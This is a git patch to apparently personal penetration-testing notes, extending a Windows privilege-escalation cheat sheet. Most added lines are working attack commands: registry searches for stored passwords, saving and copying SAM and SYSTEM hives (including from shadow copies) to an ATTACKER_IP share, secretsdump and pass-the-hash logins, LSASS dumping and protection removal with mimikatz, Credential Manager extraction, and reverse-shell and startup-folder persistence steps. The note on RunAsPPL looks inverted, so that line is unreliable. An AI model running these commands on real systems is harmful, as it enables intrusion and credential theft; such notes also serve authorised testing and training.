From 9a18fefd36ab491b3b288260a66c2245fd53ee55 Mon Sep 17 00:00:00 2001 From: whx Date: Thu, 1 Sep 2022 23:52:46 +0200 Subject: [PATCH] added priv esc for windows --- .../priv_esc/docs/windows/windows_priv_esc.md | 120 +++++++++++++++--- 1 file changed, 105 insertions(+), 15 deletions(-) diff --git a/post exploitation/priv_esc/docs/windows/windows_priv_esc.md b/post exploitation/priv_esc/docs/windows/windows_priv_esc.md index eb6e8e4..e6955a6 100644 --- a/post exploitation/priv_esc/docs/windows/windows_priv_esc.md +++ b/post exploitation/priv_esc/docs/windows/windows_priv_esc.md @@ -1,6 +1,7 @@ # Windows Privilege Escalation ## Links + * [Fundamentals](https://www.fuzzysecurity.com/tutorials/16.html) * [PowerShellEmpire](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp) * [JAWS](https://github.com/411Hall/JAWS) @@ -17,9 +18,11 @@ * __System__, local system, final escalation * __Local Service__, got anonymous connections over network. * __Network Service__, default service account, authentication via network + ## Enumeration ### Users & Groups + ```sh whoami /priv net users @@ -35,6 +38,7 @@ qwinsta * [powershell](../../../../enumeration/windows/powershell.md) ### System + ```sh hostname systeminfo | findstr /B /C:"OS Name" /C:"OS Version" @@ -48,15 +52,42 @@ wmic product get name,version,vendor wmic service list brief | findstr "Running" ``` +### Logfiles and Registry + +```sh +cmdkey /list +``` +* Keys containing passwords +``` +reg query HKLM /f password /t REG_SZ /s +reg query HKCU /f password /t REG_SZ /s +``` + +### AD Credentials + +* Check AD's NTDS, SYSVOL +* Check user description of AD users +```sh +Get-ADUser -Filter * -Properties * | select Name,SamAccountName,Description +``` + ## Exploit +* __Use found credentials__ +```sh +runas /savecred /user: reverse_shell.exe +``` + ### DLL Hijacking + * [DLL hijacking](../../../../exploit/windows/dll_hijacking/dll_hijacking.md) ### Unquoted Service Path + * [unquoted service path](../../../../exploit/windows/docs/unquoted_path.md) ### Token Impersonation + * `SeImpersonatePrivilege` is necessary, check via `whoami priv` * Hot Potato is best before Server 2019 and Windows 10 (version 1809) * [Potatos](../../../../exploit/windows/docs/potatoes.md) @@ -71,19 +102,6 @@ wmic service list brief | findstr "Running" * [Always install elevated](../../../../exploit/windows/docs/always_installed_elevated.md) -### Search for Credentials -```sh -cmdkey /list -``` -* Use found credentials -```sh -runas /savecred /user: reverse_shell.exe -``` -* Keys containing passwords -``` -reg query HKLM /f password /t REG_SZ /s -reg query HKCU /f password /t REG_SZ /s -``` ### accesschk64 Permissions * Check access to files and folders @@ -98,6 +116,7 @@ accesschk64 -wvu "file.exe" * Any other binary works as well. Copy the compiled portable executable from the `service_escalation` onto the binary path.Restart the service afterwards. #### accesschk64 for Services + ```sh accesschk64 -qlc "service.exe" ``` @@ -113,9 +132,11 @@ sc start TheService ``` ### Startup Application + * Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup` ### Password Mining + * Set up metasploit ```sh use auxiliary/server/capture/http_basic @@ -235,27 +256,39 @@ icacls C:\Path/to/service.exe /grant Everyone:F * `whoami /priv` #### SeBackup / Restore + * If `SeBackup / SeRestore` (rw on all files) is set an elevated `cmd.exe` may be opened * Download `SAM` and `System` hashes ```sh reg save hklm\system C:\Windows\Temp\system.hive reg save hklm\sam C:\Windows\Temp\sam.hive ``` +* or +```sh +copy C:\Windows\System32\config\sam \\ATTACKER_IP\ +``` * Start smb server on attack machine ```sh copy C:\Windows\Temp\sam.hive \\ATTACKER_IP\ copy C:\Windows\Temp\system.hive \\ATTACKER_IP\ ``` + * Dump the hashes ```sh secretsdump.py -sam sam.hive -system system.hive LOCAL ``` +* or meterpreter on target +```sh +hashdump +``` + * Use pass the hash to login ```sh psexec.py -hashes administrator@$TARGET_IP ``` #### SeTakeOwnership + * If `SeTakeOwnership` is set one can take ownership of every file or service. ```sh takeown /f C:\Windows\System32\Utilman.exe @@ -264,9 +297,7 @@ copy cmd.exe utilman.exe ``` * Log out, on the Login screen click on `Ease of Access` - #### SeImpersonate / SeAssignPrimaryToken - * It is a rouge potato * Execute process as another user * Service accounts operate through impersonation @@ -277,3 +308,62 @@ socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234 ``` * Catch the potatoe executable from target via netcat + +### Volume Shadow Copy Service + +* Take a look at the volumes at +```sh +vssadmin list shadows +``` + +* Copy `sam` and `system` from the shadow copy +```sh +copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam \\ATTACKER_IP\ +copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\ +``` + +### Dump LSASS + +* If administrator permissions are gained, a dump file can be created by opening the task manager and right clicking `lsass.exe` -> `creat dumpfile` +* Use `procdump.exe` from sysinternal suite as an alternative to `tskmgr.exe` + +* Extract the dump via mimikatz +```sh +privilege::debug +sekurlsa::logonpasswords +``` + +### LSASS Protection + +* If the dump cannot be created because it is protected change `RunAsPPL` DWORD to `1` under +```sh +HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa +``` + +* Alternatively use mimikatz +```sh +!+ +!processprotect /process:lsass.exe /remove +``` + +### Windows Credential Manager + +* Can be found via `Control Pane` -> `User Accounts` -> `Credential Manager` +* Alternatively, command line can be used +```sh +vaultcmd /list +vaultcmd /listproperties:"Web Credentials" +vaultcmd /listcreds:"web credentials" +``` + +* Extract the password via powershell script [Get-WebCredentials from nishang](https://github.com/samratashok/nishang/blob/master/Gather/Get-WebCredentials.ps1) +```sh +powershell -ex bypass +Get-WebCredentials +``` + +* Via mimikatz if administrative permissions have been gained +```sh +privilege::debug +sekurlsa::credman +```